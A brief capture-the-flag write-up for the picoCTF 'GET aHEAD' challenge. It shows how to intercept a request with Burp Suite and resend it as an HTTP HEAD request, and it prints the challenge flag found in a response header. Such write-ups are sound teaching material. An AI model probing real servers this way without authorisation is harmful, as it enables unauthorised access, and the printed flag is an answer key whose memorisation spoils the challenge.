# GET aHEAD

## Problem

> Find the flag being held on this server to get ahead of the competition <http://mercury.picoctf.net:47967/>

## Solution

1. Use Burp Suite to intercept the request of clicking the "Choose Blue" button.
2. Change the POST request to a HEAD request:

   ```
   HEAD /index.php HTTP/1.1
   Host: mercury.picoctf.net:47967
   Content-Length: 0
   Origin: http://mercury.picoctf.net:47967
   Connection: close
   ```
3. The returned HTML from the HEAD request in the browser will be empty, but in the HTTP history tab of Proxy in Burp Suite you can find the flag as a HTTP header in the response:

   ```
   HTTP/1.1 200 OK
   flag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
   Content-type: text/html; charset=UTF-8
   ```

### Flag

`picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}`